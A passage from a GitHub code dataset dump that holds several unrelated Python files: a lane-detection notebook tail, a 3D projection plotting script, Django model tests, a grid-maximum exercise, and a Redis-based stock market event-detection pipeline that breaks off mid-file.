'gray')\n\n\n# In[31]:\n\n\no_img = np.asarray(cropped_image_acc_gray)\np_img = np.asarray(line_image_acc_gray)\n\n\n# In[32]:\n\n\ndist = np.linalg.norm(o_img - p_img)\n\n\n# In[33]:\n\n\nAccuracy_percentage = 100 - dist/100\n\nAccuracy_percentage\n\n\n# In[34]:\n\n\ncombo_image = cv2.addWeighted(lane_image, 0.8, line_image, 1, 1)\nplt.imshow(combo_image, cmap = 'gray')\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"MarsRoboters/lane_line_detection_with_accracy-","sub_path":"Lane_line_detection_with_accuracy.py","file_name":"Lane_line_detection_with_accuracy.py","file_ext":"py","file_size_in_byte":2472,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"40876178725","text":"import numpy as np\nimport math\nfrom matplotlib import cm\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\ndef GetPoints(DIRECTORY):\n f = open(DIRECTORY, \"r\")\n LINES, LINE = [],[]\n contents = f.readlines()\n for k in range(0,len(contents)):\n if contents[k][0] == \"l\":\n if LINE != []:\n LINES.append(LINE)\n LINE=[]\n else:\n LINE.append(contents[k].split(\"\\n\")[0].split(\",\"))\n return LINES\n\ndef GetLines(PL):\n N = len(PL)\n VECTORS=[]\n for j in range(0,N):\n VECTOR=[]\n for k in range (1, len(PL[j])):\n VECTOR.append([float(PL[j][k][0])-float(PL[j][k-1][0]),float(PL[j][k][1])-float(PL[j][k-1][1]),float(PL[j][k][2])-float(PL[j][k-1][2])])\n VECTORS.append(VECTOR)\n return VECTORS\n\ndef DotProduct3D(VECT1, VECT2):\n product = (VECT1[0]*VECT2[0])+(VECT1[1]*VECT2[1])+(VECT1[2]*VECT2[2])\n return product\n\ndef VectorRejection(VECT1, VECT2):\n MAG = math.sqrt((VECT1[0]-VECT2[0])**2+(VECT1[1]-VECT2[1])**2+(VECT1[2]-VECT2[2])**2)\n return MAG\n\n\ndef main():\n directory = '../lines.txt'\n\n toggleplot=1\n points_list = GetPoints(directory)\n line_list = GetLines(points_list)\n\n radius =5\n N_view = 120\n theta_inc = 2*math.pi/N_view\n azi_inc = theta_inc\n\n ViewPoints = np.empty((N_view, N_view, 3))\n Norms = np.empty((N_view, N_view, 3))\n Lengths = np.empty((N_view, N_view, len(line_list[0])))\n surprise = np.empty((N_view, N_view, 
1))\n\n #Load the ViewPoints array, Norms array, and compute projection lengths\n for th in range(0,N_view):\n for az in range(0,N_view):\n ViewPoints[th, az] = [radius*math.cos(th*theta_inc)*math.sin(az*azi_inc),radius*math.sin(th*theta_inc)*math.sin(az*azi_inc),radius*math.cos(az*azi_inc)]\n Norms[th, az] = [-math.cos(th*theta_inc)*math.sin(az*azi_inc),-math.sin(th*theta_inc)*math.sin(az*azi_inc),-math.cos(az*azi_inc)]\n for inc1 in range(0,len(line_list)):\n LEN=0\n for inc2 in range(0,len(line_list[inc1])):\n Projection = DotProduct3D(Norms[th, az],line_list[inc1][inc2])\n Rejection = VectorRejection(line_list[inc1][inc2],Projection*Norms[th, az])\n LEN+=Rejection\n Lengths[th, az, inc1] = LEN\n surprise[th, az, 0] = Lengths[th, az, 1] - Lengths[th, az, 0]\n\n if toggleplot ==1:\n fig = plt.figure()\n ax = plt.axes(projection=\"3d\")\n ax.scatter3D(ViewPoints[:,:,0], ViewPoints[:,:,1], ViewPoints[:,:,2], color=\"green\")\n plt.title(\"View Points\")\n plt.show()\n plt.close()\n fig = plt.figure()\n ax1 = plt.axes(projection=\"3d\")\n plt.title(\"Apparent Lengths\")\n ax1.set_xlabel('x')\n ax1.set_ylabel('y')\n ax1.set_zlabel('z')\n colors = cm.ScalarMappable(cmap=\"Blues\").to_rgba(Lengths[:,:,0])\n ax1.plot_surface(ViewPoints[:,:,0], ViewPoints[:,:,1],ViewPoints[:,:,2],rstride=1,cstride=1,facecolors=colors)\n plt.show()\n plt.close()\n fig = plt.figure()\n ax1 = plt.axes(projection=\"3d\")\n plt.title(\"Apparent Lengths\")\n ax1.set_xlabel('x')\n ax1.set_ylabel('y')\n ax1.set_zlabel('z')\n colors = cm.ScalarMappable(cmap=\"Reds\").to_rgba(Lengths[:,:,1])\n ax1.plot_surface(ViewPoints[:,:,0], ViewPoints[:,:,1],ViewPoints[:,:,2],rstride=1,cstride=1,facecolors=colors)\n plt.show()\n plt.close()\n fig = plt.figure()\n ax1 = plt.axes(projection=\"3d\")\n plt.title(\"Apparent Length Delta\")\n ax1.set_xlabel('x')\n ax1.set_ylabel('y')\n ax1.set_zlabel('z')\n colors = cm.ScalarMappable(cmap=\"seismic\").to_rgba(surprise[:,:,0])\n ax1.plot_surface(ViewPoints[:,:,0], ViewPoints[:,:,1],ViewPoints[:,:,2],rstride=1,cstride=1,facecolors=colors)\n plt.show()\n plt.close()\n plt.hist(Lengths[:,:,0].reshape(N_view*N_view), bins=100, alpha=0.5, color='blue', density=True)\n plt.show()\n plt.close()\n plt.hist(Lengths[:,:,1].reshape(N_view*N_view), bins=100, alpha=0.5, color='red', density=True)\n plt.show()\n plt.close()\n plt.hist(surprise[:,:,0].reshape(N_view*N_view), bins=100, density=True)\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"projection-error/projection-experiment","sub_path":"projection-experiment.py","file_name":"projection-experiment.py","file_ext":"py","file_size_in_byte":4369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37996396581","text":"from django.test import TestCase\nfrom polls.models import Question,Choice\nimport datetime\n\nclass QuestionModelTests(TestCase):\n def test_is_empty(self):\n saved_posts = Question.objects.all()\n self.assertEqual(saved_posts.count(), 0)\n \n def test_is_count_one(self):\n question = Question(question_text='test_question',pub_date= datetime.datetime.now())\n question.save()\n saved_posts = Question.objects.all()\n self.assertEqual(saved_posts.count(), 1)\n\n # def test_saving_and_retrieving_post(self):\n # question = Question()\n # question_text = 'test_question_to_retrieve'\n # question.question_text = question_text\n # question.save()\n\n # saved_posts = Question.objects.all()\n # actual_post = saved_posts[0]\n\n # 
self.assertEqual(actual_post.question_text, question_text)\n\nclass ChoiceModelTests(TestCase):\n def test_is_empty(self):\n saved_posts = Choice.objects.all()\n self.assertEqual(saved_posts.count(), 0)\n \n # def test_is_count_one(self):\n # choice = Choice(question_id=question_id,choice_text='test_question',votes=0)\n # choice.save()\n # saved_posts = Choice.objects.all()\n # self.assertEqual(saved_posts.count(), 1)\n\n # def test_saving_and_retrieving_post(self):\n # choice = Choice()\n # choice_text = 'test_choice_to_retrieve'\n # choice.choice_text = choice_text\n # choice.save()\n\n # saved_posts = Choice.objects.all()\n # actual_post = saved_posts[0]\n\n # self.assertEqual(actual_post.choice_textt, choice_text)","repo_name":"daichi0918/django_polls_keroz","sub_path":"app/polls/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28095620237","text":"import sys\nsys.stdin = open('./input.txt', 'r')\ninput=sys.stdin.readline;\n\nans = 0\nX = 0\nY = 0\n\narr = []\nfor _ in range(9):\n arr.append(list(map(int, input().split())))\n\nfor i in range(9):\n for j in range(9):\n if arr[i][j] > ans: \n ans = arr[i][j]\n X = i + 1\n Y = j + 1\nprint(ans)\nprint(X, Y)","repo_name":"Paperkeem/Algorithm-baekjoon","sub_path":"수학/b2566/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33817551476","text":"import time\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom datetime import datetime\nimport numpy as np\nimport TimeSeriesEvents\nimport MSig_Functions as MSig\nimport sys,os\nimport argparse\nfrom typing import List\nimport redis\nimport threading\n\nMSIG_OUTPUT=\"msig:output\"\nif \"MSIG_MYSQL_PASS\" in os.environ:\n MSIG_MYSQL_PASS=os.environ[\"MSIG_MYSQL_PASS\"]\nelse:\n print(\"Unable to read environment variable MSIG_MYSQL_PASS...\")\n MSIG_MYSQL_PASS=\"\"\n_=np.seterr(all=\"ignore\")\ndef get_cli_parser() -> argparse.ArgumentParser:\n parser = argparse.ArgumentParser(add_help=False)\n parser.add_argument(\n '--period',\n type=int,\n default=600,\n help=\"period of signal processing in sec. 300 --> analyze data for every 5 min.\"\n )\n parser.add_argument(\n '--L2fileName',\n type=str,\n default='finL2Extension.graphml',\n help='L2 file for symbols and company names'\n )\n parser.add_argument(\n '--redis_host',\n type=str,\n default='localhost',\n help='redis host for input time series'\n )\n parser.add_argument(\n '--redis_port',\n type=int,\n default=6381,\n help='redis port for input time series'\n )\n parser.add_argument(\n '--msig_host',\n type=str,\n default='localhost',\n help='redis host for signal output'\n )\n parser.add_argument(\n '--msig_port',\n type=int,\n default=6379,\n help='redis port for signal output'\n )\n parser.add_argument(\n '--mind_host',\n type=str,\n default='localhost',\n help='redis host for index output'\n )\n parser.add_argument(\n '--mind_port',\n type=int,\n default=6378,\n help='redis port for index output'\n )\n parser.add_argument(\n '--from_time',\n type=int,\n default=0,\n help='end of data analysis interval for time series. This is the larger one. 0 means now'\n )\n parser.add_argument(\n '--to_time',\n type=int,\n default=-1,\n help='start of data analysis interval for time series. This is the larger one. 
-1 means the oldest time stamps available'\n    )\n    parser.add_argument(\n        '--prefix',\n        type=str,\n        default='rts1:01:',\n        help='prefix of the keys of interest on redis'\n    )\n    parser.add_argument(\n        '--aggregation_type',\n        type=str,\n        default='last',\n        help='time series aggregation type (min, max, avg, first, last...)'\n    )\n    parser.add_argument(\n        '--bucket_size_msec',\n        type=int,\n        default=60000,\n        help='aggregation bucket size in msec for time series'\n    )\n    parser.add_argument(\n        '--num_regimes',\n        type=int,\n        default=20,\n        help='max number of semantic segmentation per time series for MP'\n    )\n    parser.add_argument(\n        '--window_size',\n        type=int,\n        default=10,\n        help='window size for semantic segmentation of time series for MP. When MP disabled, this is the parameter for percent-change-based gain and loss index.'\n    )\n    parser.add_argument(\n        '--last_batch_control_variable',\n        type=str,\n        default=\"mac_simlooping\",\n        help='this variable marks if this is the end'\n    )\n    parser.add_argument(\n        '--filters',\n        type=str,\n        default=\"SYMSET=ACTIVE_VOLUME,SYMSET=ACTIVE_PRICE\",\n        help='Filtering labels for redis mrange bulk reading'\n    )\n    parser.add_argument(\n        '--ts_freq_threshold',\n        type=int,\n        default=20,\n        help='threshold value for number of simultaneous regime changes for event detection'\n    )\n    parser.add_argument(\n        '--peek_ratio',\n        type=float,\n        default=0.30,\n        help='threshold value for peaks on histogram for event detection'\n    )\n    parser.add_argument(\n        '--enablePlotting',\n        default=False,\n        help='Enable plotting of histograms and events.',\n        action='store_true',\n        dest='enablePlotting'\n    )\n    parser.add_argument(\n        '--killMSig',\n        default=False,\n        help='Signal to kill MSig.',\n        action='store_true',\n        dest='killMSig'\n    )\n    parser.add_argument(\n        '--enableSectorIndustry',\n        default=True,\n        help='Enable sector and industry-based analysis of events.',\n        action='store_false',\n        dest='enableSectorIndustry'\n    )\n    parser.add_argument(\n        '--enablePrediction',\n        default=False,\n        help='Enable prediction based on event analysis.',\n        action='store_true',\n        dest='enablePrediction'\n    )\n    parser.add_argument(\n        '--enableNewsGeneration',\n        default=True,\n        help='Enable news generation based on event analysis.',\n        action='store_false',\n        dest='enableNewsGeneration'\n    )\n    parser.add_argument(\n        '--saveToMysql',\n        default=True,\n        help='Enable saving session info and events to MySQL.',\n        action='store_false',\n        dest='saveToMysql'\n    )\n    parser.add_argument(\n        '--mysql_port',\n        type=int,\n        default=3307,\n        help='mysql port for signal output'\n    )\n    parser.add_argument(\n        '--mysql_host',\n        type=str,\n        default='127.0.0.1',\n        help='mysql host for signal output'\n    )\n    parser.add_argument(\n        '--mysql_user',\n        type=str,\n        default='root',\n        help='mysql user for signal output'\n    )\n    parser.add_argument(\n        '--mysql_db',\n        type=str,\n        default='msig',\n        help='mysql database for signal output'\n    )\n    parser.add_argument(\n        '--mysql_pass',\n        type=str,\n        default=MSIG_MYSQL_PASS,\n        help='mysql password for signal output. Default is set to the environment variable $MSIG_MYSQL_PASS'\n    )\n    parser.add_argument(\n        '--enableMP',\n        default=False,\n        help='Enable using matrix profile based event generation. 
When disabled, gain loss indices are used.',\n        action='store_true',\n        dest='enableMP'\n    )\n    parser.add_argument(\n        '--isLive',\n        default=True,\n        help='Parameter to make sure this port is the live data port',\n        action='store_false',\n        dest='isLive'\n    )\n    parser.add_argument(\n        '--enableCorrelations',\n        default=True,\n        help='Enable pushing correlation plots to the front end. Event correlations are pushed at each computation. Industries are daily',\n        action='store_false',\n        dest='enableCorrelations'\n    )\n    parser.add_argument(\n        '--gainLossEventRatio',\n        type=float,\n        default=0.05,\n        help='If a peak\\'s height is greater/smaller than this ratio, it is an event' \n    )\n    parser.add_argument(\n        '--gainLossIndicatorThreshold',\n        type=float,\n        default=0.025,\n        help='If a company\\'s gain/loss is larger/smaller than this ratio, it is an indicator of that event' \n    )\n    parser.add_argument(\n        '--timeZone',\n        type=str,\n        default='US/Pacific',\n        help='Time zone of the context' \n    )\n    parser.add_argument(\n        '--curatedNews',\n        type=str,\n        default='USA Political, Bitcoin, Covid-19',\n        help='Topics for curated news' \n    )\n    return parser\n\n#MAIN LOOP\ndef main(args: List[str],isLoopOnce=False) -> None:\n    import json\n    import distutils.util\n    from datetime import datetime, timedelta\n    import time\n    import pytz\n    year=0\n    month=0\n    hour=0\n    day=0\n    minute=0\n    x=datetime.today()\n    isStartofDay=False\n    parser = get_cli_parser()\n    cli_options = parser.parse_args(args)\n    cli_options.window_size=[cli_options.window_size]\n    #cli_options.filters=[cli_options.filters]\n    is_system_start=True \n    process_period=cli_options.period\n    redis_msig=redis.Redis(host=cli_options.msig_host,port=cli_options.msig_port)\n    #SIGNAL GENERATION LOOP\n    loop_num=0\n    msig_clock=time.time()\n    while(True):\n        #Set or read default parameters from/to msig_redis\n        if(is_system_start):\n            #TODO: Add all parameters here for dynamic controlling\n            print(\"1. LOOP BEGINS. 
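# A minimal sketch of the percent-change gain/loss screen that the window_size and
# gainLossIndicatorThreshold options above describe for the non-MP path; the real
# logic lives in MSig.getEventsFromGainLoss (not shown here), so the wide price
# frame layout and the simple per-row counting below are assumptions:
import pandas as pd

def gain_loss_index(prices: pd.DataFrame, window: int = 10, threshold: float = 0.025) -> pd.DataFrame:
    change = prices.pct_change(periods=window)   # per-symbol change over the window
    return pd.DataFrame({
        "gain_index": (change > threshold).sum(axis=1),   # symbols up more than threshold
        "loss_index": (change < -threshold).sum(axis=1),  # symbols down more than threshold
    })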
Keep an eye on 'msig' database @ mysql...\")\n _=redis_msig.set('msig:param:period',int(cli_options.period)) #Event detection period\n _=redis_msig.set('msig:param:num_regimes',int(cli_options.num_regimes)) #number of max regime changes\n _=redis_msig.set('msig:param:window_size',str(cli_options.window_size).encode('utf-8')) #window size for sem seg\n _=redis_msig.set('msig:param:peek_ratio',cli_options.peek_ratio) #Peek ratio for event detection on histograms\n _=redis_msig.set('msig:param:ts_freq_threshold',cli_options.ts_freq_threshold) #Threshold value for num of reg changes for event detection on histograms\n _=redis_msig.set('msig:param:enableSectorIndustry',str(cli_options.enableSectorIndustry)) #Bool var if sector and industry analysis is required\n _=redis_msig.set('msig:param:bucket_size_msec',int(cli_options.bucket_size_msec)) #aggregation bucket size\n _=redis_msig.set('msig:param:aggregation_type',str(cli_options.aggregation_type)) #aggregation type\n _=redis_msig.set('msig:param:enableCorrelations',str(cli_options.enableCorrelations)) #aggregation bucket size\n _=redis_msig.set('msig:param:enableMP',str(cli_options.enableMP)) #aggregation bucket size\n _=redis_msig.set('msig:param:enableNewsGeneration',str(cli_options.enableNewsGeneration)) #aggregation bucket size\n _=redis_msig.set('msig:param:enablePlotting',str(cli_options.enablePlotting)) #aggregation bucket size\n _=redis_msig.set('msig:param:enablePrediction',str(cli_options.enablePrediction)) #aggregation bucket size\n _=redis_msig.set('msig:param:enableSectorIndustry',str(cli_options.enableSectorIndustry)) #aggregation bucket size\n _=redis_msig.set('msig:param:from_time',int(cli_options.from_time)) #aggregation bucket size\n _=redis_msig.set('msig:param:to_time',int(cli_options.to_time)) #aggregation bucket size\n _=redis_msig.set('msig:param:gainLossEventRatio',cli_options.gainLossEventRatio) #aggregation bucket size\n _=redis_msig.set('msig:param:gainLossIndicatorThreshold',cli_options.gainLossIndicatorThreshold) #aggregation bucket size\n _=redis_msig.set('msig:param:saveToMysql',str(cli_options.saveToMysql)) \n _=redis_msig.set('msig:param:killMSig',str(cli_options.killMSig)) \n _=redis_msig.set('msig:param:isLive',str(cli_options.isLive)) \n _=redis_msig.set('msig:param:curatedNews',str(cli_options.curatedNews)) \n loop_num=loop_num+1\n else:\n cli_options.period=int(redis_msig.get('msig:param:period'))\n cli_options.num_regimes=int(redis_msig.get('msig:param:num_regimes'))\n cli_options.window_size=list(map(int,redis_msig.get('msig:param:window_size').decode('utf-8')[1:-1].split(',')))\n cli_options.peek_ratio=float(redis_msig.get('msig:param:peek_ratio'))\n cli_options.ts_freq_threshold=int(redis_msig.get('msig:param:ts_freq_threshold'))\n cli_options.enableSectorIndustry=bool(distutils.util.strtobool(redis_msig.get('msig:param:enableSectorIndustry').decode('utf-8')))\n cli_options.bucket_size_msec=int(redis_msig.get('msig:param:bucket_size_msec'))\n cli_options.aggregation_type=str(redis_msig.get('msig:param:aggregation_type').decode('utf-8'))\n cli_options.enableCorrelations=bool(distutils.util.strtobool(redis_msig.get('msig:param:enableCorrelations').decode('utf-8')))\n cli_options.enableMP=bool(distutils.util.strtobool(redis_msig.get('msig:param:enableMP').decode('utf-8')))\n cli_options.enableNewsGeneration=bool(distutils.util.strtobool(redis_msig.get('msig:param:enableNewsGeneration').decode('utf-8')))\n 
cli_options.enablePlotting=bool(distutils.util.strtobool(redis_msig.get('msig:param:enablePlotting').decode('utf-8')))\n cli_options.enablePrediction=bool(distutils.util.strtobool(redis_msig.get('msig:param:enablePrediction').decode('utf-8')))\n cli_options.enableSectorIndustry=bool(distutils.util.strtobool(redis_msig.get('msig:param:enableSectorIndustry').decode('utf-8')))\n cli_options.from_time=int(redis_msig.get('msig:param:from_time'))\n cli_options.to_time=int(redis_msig.get('msig:param:to_time'))\n cli_options.gainLossEventRatio=float(redis_msig.get('msig:param:gainLossEventRatio'))\n cli_options.gainLossIndicatorThreshold=float(redis_msig.get('msig:param:gainLossIndicatorThreshold'))\n cli_options.saveToMysql=bool(distutils.util.strtobool(redis_msig.get('msig:param:saveToMysql').decode('utf-8')))\n cli_options.killMSig=bool(distutils.util.strtobool(redis_msig.get('msig:param:killMSig').decode('utf-8')))\n cli_options.isLive=bool(distutils.util.strtobool(redis_msig.get('msig:param:isLive').decode('utf-8')))\n cli_options.curatedNews=redis_msig.get('msig:param:curatedNews').decode('utf-8')\n if(cli_options.killMSig):\n print(\"Kill signal received\")\n print(\"Bye!\")\n _=redis_msig.set('msig:param:killMSig','False') \n return\n x=datetime.today()\n year=x.year\n month=x.month\n day=x.day\n hour=x.hour\n minute=x.minute\n weekday=x.weekday()\n if(weekday==5):#saturday\n future=datetime(x.year, x.month, x.day,6,41)+timedelta(days=2)\n print(\"Don't kill me yet. Wait for the Thread to send 'Done' signal!\\n\")\n print(\"Market is not open. Sleeping until \",future)\n time.sleep((future-x).total_seconds())\n isStartofDay=True\n elif(weekday==6):#sunday\n future=datetime(x.year, x.month, x.day,6,41)+timedelta(days=1)\n print(\"Don't kill me yet. Wait for the Thread to send 'Done' signal!\\n\")\n print(\"Market is not open. Sleeping until \",future)\n time.sleep((future-x).total_seconds())\n isStartofDay=True\n else:#weekdays\n if(hour<6 or (hour==6 and minute<41)):\n future=datetime(x.year, x.month, x.day,6,41)\n print(\"Market is not open. Sleeping until \",future)\n print(\"Don't kill me yet. Wait for the Thread to send 'Done' signal!\\n\")\n time.sleep((future-x).total_seconds())\n isStartofDay=True\n elif(hour>13 or (hour==13 and minute>15)):\n if(weekday==4):#friday, sleep 2 days\n future=datetime(x.year, x.month, x.day,6,41)+timedelta(days=3)\n else:#other weekdays sleep 1 day\n future=datetime(x.year, x.month, x.day,6,41)+timedelta(days=1)\n print(\"Market is closed. Sleeping until \",future)\n print(\"Don't kill me yet. Wait for the Thread to send 'Done' signal!\\n\")\n time.sleep((future-x).total_seconds())\n isStartofDay=True\n #If this is the first processing or we have waited long enough for process_period, repeat\n if(is_system_start or time.time()-msig_clock>=process_period):\n start=time.time()\n if(not(is_system_start)):\n loop_num+=1\n print(loop_num, \". 
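# A minimal sketch of the pattern used by the control loop above, which round-trips
# every CLI flag through Redis keys (msig:param:*) so parameters can be changed
# between iterations: booleans are stored as str(True/False) and parsed back with
# distutils.util.strtobool. Host and port below are illustrative:
import redis
from distutils.util import strtobool

r = redis.Redis(host="localhost", port=6379)
r.set("msig:param:enablePlotting", str(True))  # stored as b"True"
flag = bool(strtobool(r.get("msig:param:enablePlotting").decode("utf-8")))
print(flag)  # True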
LOOP BEGINS:\")\n is_system_start=False\n \n while(True):#Try reading data from mrF\n try:\n all_data=MSig.get_data_from_mrF(redis_host=cli_options.redis_host,redis_port=cli_options.redis_port,\n from_time=cli_options.from_time,to_time=cli_options.to_time,\n query_key=None,prefix=cli_options.prefix,\n aggregation_type=cli_options.aggregation_type,bucket_size_msec=\\\n cli_options.bucket_size_msec,last_batch_control_variable=cli_options.last_batch_control_variable,filters=cli_options.filters)\n \n # if(len(all_data)>0):\n # if(cli_options.isLive):\n # tmp_date=datetime.fromtimestamp(all_data['ts_price_min']/1000).astimezone(pytz.timezone(cli_options.timeZone))\n # if(tmp_date.year != year or tmp_date.year != month or tmp_date.year != day):\n # print(\"Data belongs to\", tmp_date.strftime(\"%Y-%m-%d\"),\". Today is\",x.strftime(\"%Y-%m-%d\"))\n # print(\"Either disable isLive parameter or check your data on Redis.TERMINATING...\")\n # return\n break\n except Exception as e:\n print(e)\n print(\"sleeping for\",process_period,\"sec. before trying again\")\n time.sleep(process_period)\n \n if(cli_options.enableMP):\n print(\"Using Matrix Profile algorithm...\")\n #GET REGIME CHANGES\n print(\"Performing semantic segmentation of prices...\")\n df_regimes_price=MSig.get_regime_changes(all_data[\"df_price_data\"],num_regimes=cli_options.num_regimes,windows=cli_options.window_size[0])\n print(\"Performing semantic segmentation of volumes...\")\n df_regimes_volume=MSig.get_regime_changes(all_data[\"df_volume_data\"],num_regimes=cli_options.num_regimes,windows=cli_options.window_size[0])\n #GET HISTOGRAMS\n print(\"Producing histogram of regime changes for prices...\")\n histogram_price=MSig.getHistogramFromUnalignedDf(df_regimes_price,all_data[\"ts_price\"],all_data[\"ts_price_min\"],all_data[\"ts_price_max\"],cli_options.bucket_size_msec,window_size=cli_options.window_size[0])\n print(\"Producing histogram of regime changes for volumes...\")\n histogram_volume=MSig.getHistogramFromUnalignedDf(df_regimes_volume,all_data[\"ts_volume\"],all_data[\"ts_volume_min\"],all_data[\"ts_volume_max\"],cli_options.bucket_size_msec,window_size=cli_options.window_size[0])\n #Plotting\n all_ts_price=list(range(all_data[\"ts_price_min\"], all_data[\"ts_price_max\"]+cli_options.bucket_size_msec,cli_options.bucket_size_msec))\n date_time_stamps=[datetime.fromtimestamp(i/1000) for i in all_ts_price]\n if(cli_options.enablePlotting):\n print(\"Attempting to plot histograms visually...\")\n plt.title(\"Histogram of price regime changes\")\n markerline, stemlines, baseline = plt.stem(date_time_stamps,histogram_price,markerfmt=\" \")\n plt.figure()\n all_ts_volume=list(range(all_data[\"ts_volume_min\"], all_data[\"ts_volume_max\"]+cli_options.bucket_size_msec,cli_options.bucket_size_msec))\n date_time_stamps=[datetime.fromtimestamp(i/1000) for i in all_ts_volume]\n if(cli_options.enablePlotting):\n plt.title(\"Histogram of volume regime changes\")\n markerline, stemlines, baseline = plt.stem(date_time_stamps,histogram_volume,markerfmt=\" \")\n #Detect events\n events_price=TimeSeriesEvents.getCandidateEvents(histogram_price,len(all_ts_price),ts_freq_threshold=cli_options.ts_freq_threshold,peek_ratio=cli_options.peek_ratio,sampling_rate=cli_options.bucket_size_msec)\n events_volume=TimeSeriesEvents.getCandidateEvents(histogram_volume,len(all_ts_volume),ts_freq_threshold=cli_options.ts_freq_threshold,peek_ratio=cli_options.peek_ratio,sampling_rate=cli_options.bucket_size_msec)\n print(events_price)\n print(events_volume)\n 
#plot events\n if(cli_options.enablePlotting):\n print(\"Attempting to plot events visually ...\")\n p1=MSig.plotMSigEvents(len(all_ts_price),histogram_price,events_price,\"Price Events\",cli_options.bucket_size_msec)\n p1.figure()\n p2=MSig.plotMSigEvents(len(all_ts_volume),histogram_volume,events_volume,\"Volume Events\",cli_options.bucket_size_msec)\n p2.show()\n #indicators\n #all_data[\"ts_volume_min\"], all_data[\"ts_volume_max\"]\n indicators_price=MSig.getIndicators(all_data,events_price,df_regimes_price,all_data[\"ts_price_min\"],all_data[\"ts_price_max\"],\"ts_price\",\"df_price_data\",cli_options.bucket_size_msec)\n indicators_volume=MSig.getIndicators(all_data,events_volume,df_regimes_volume,all_data[\"ts_volume_min\"],all_data[\"ts_volume_max\"],\"ts_volume\",\"df_volume_data\",cli_options.bucket_size_msec)\n #get market capitals per event\n df_market_capital_price=MSig.getMarketCapitalPerEvent(all_ts_price,all_data,events_price,indicators_price)\n df_market_capital_volume=MSig.getMarketCapitalPerEvent(all_ts_volume,all_data,events_volume,indicators_volume)\n else:\n if(len(all_data)==0):\n print(\"There is no data to process from Mr. F\")\n return\n print(\"Calculating events & indicators based on gain/loss\")\n isThreadRunning=True\n sleep_count=0\n while(isThreadRunning):\n try:\n sleep_count=sleep_count+1\n events_price_gain,events_price_loss, events_volume_gain, events_volume_loss,indicators_price_gain,indicators_price_loss, indicators_volume_gain, indicators_volume_loss=MSig.getEventsFromGainLoss(all_data,cli_options.window_size[0],cli_options.enablePlotting,cli_options.gainLossEventRatio,cli_options.gainLossIndicatorThreshold,cli_options.mind_host,cli_options.mind_port,cli_options.bucket_size_msec,all_data[\"ts_price_min\"],cli_options.prefix,cli_options.L2fileName) \n isThreadRunning=False\n if(sleep_count==5):isThreadRunning=False\n except Exception as e:\n print(e)\n print(\"sleeping for 30 seconds to make sure thread safe\")\n time.sleep(30)\n all_ts_price=list(range(all_data[\"ts_price_min\"], all_data[\"ts_price_max\"]+cli_options.bucket_size_msec,cli_options.bucket_size_msec))\n df_market_capital_price_gain=MSig.getMarketCapitalPerEvent(all_ts_price,all_data,events_price_gain,indicators_price_gain)\n df_market_capital_price_loss=MSig.getMarketCapitalPerEvent(all_ts_price,all_data,events_price_loss,indicators_price_loss)\n all_ts_volume=list(range(all_data[\"ts_volume_min\"], all_data[\"ts_volume_max\"]+cli_options.bucket_size_msec,cli_options.bucket_size_msec))\n df_market_capital_volume_gain=MSig.getMarketCapitalPerEvent(all_ts_volume,all_data,events_volume_gain,indicators_volume_gain)\n df_market_capital_volume_loss=MSig.getMarketCapitalPerEvent(all_ts_volume,all_data,events_volume_loss,indicators_volume_loss)\n print(\"Numbers for events_price_gain={},events_price_loss={}, events_volume_gain={}, events_volume_loss={}\".format(len(events_price_gain),len(events_price_loss),len(events_volume_gain),len(events_volume_loss)))\n events_price=pd.concat([events_price_gain,events_price_loss],axis=0).reset_index(drop=True)\n events_volume=pd.concat([events_volume_gain,events_volume_loss],axis=0).reset_index(drop=True)\n indicators_price=pd.concat([indicators_price_gain,indicators_price_loss],axis=0).reset_index(drop=True)\n indicators_volume=pd.concat([indicators_volume_gain,indicators_volume_loss],axis=0).reset_index(drop=True)\n if(len(df_market_capital_price_gain)>0 and len(df_market_capital_price_loss)>0):\n 
df_market_capital_price_loss[\"event_number\"]+=max(df_market_capital_price_gain[\"event_number\"])\n df_market_capital_price=pd.concat([df_market_capital_price_gain,df_market_capital_price_loss],axis=0).reset_index(drop=True)\n if(len(df_market_capital_volume_gain)>0 and len(df_market_capital_volume_loss)>0):\n df_market_capital_volume_loss[\"event_number\"]+=max(df_market_capital_volume_gain[\"event_number\"])\n df_market_capital_volume=pd.concat([df_market_capital_volume_gain,df_market_capital_volume_loss],axis=0).reset_index(drop=True)\n\n #sector industry analysis\n df_sectors_price=pd.DataFrame()\n df_industries_price=pd.DataFrame()\n df_sectors_volume=pd.DataFrame()\n df_industries_volume=pd.DataFrame()\n if(cli_options.enableSectorIndustry):\n print(\"Analyzing sectors and industries ...\")\n df_sectors_price,df_industries_price=MSig.getSectorIndustryPerEvent(indicators_price,\"finL2Extension.graphml\")\n df_sectors_volume,df_industries_volume=MSig.getSectorIndustryPerEvent(indicators_volume,\"finL2Extension.graphml\")\n\n #Send signal data to Redis\n print(\"Preparing data for News generation and MSig database...\")\n msig_data={\"loop_num\":loop_num,\"ts_price\":all_data[\"ts_price\"],\"ts_volume\":all_data[\"ts_volume\"],\\\n \"events_price\":events_price,\"events_volume\":events_volume,\\\n \"indicators_price\":indicators_price,\"indicators_volume\":indicators_volume,\\\n \"df_sectors_price\":df_sectors_price,\"df_industries_price\":df_industries_price,\\\n \"df_sectors_volume\":df_sectors_volume,\"df_industries_volume\":df_industries_volume,\\\n \"df_market_capital_price\":df_market_capital_price,\"df_market_capital_volume\":df_market_capital_volume, \\\n \"ts_price_min\":all_data[\"ts_price_min\"],\"ts_price_max\":all_data[\"ts_price_max\"],\"ts_volume_min\":all_data[\"ts_volume_min\"],\"ts_volume_max\":all_data[\"ts_volume_max\"]}\n 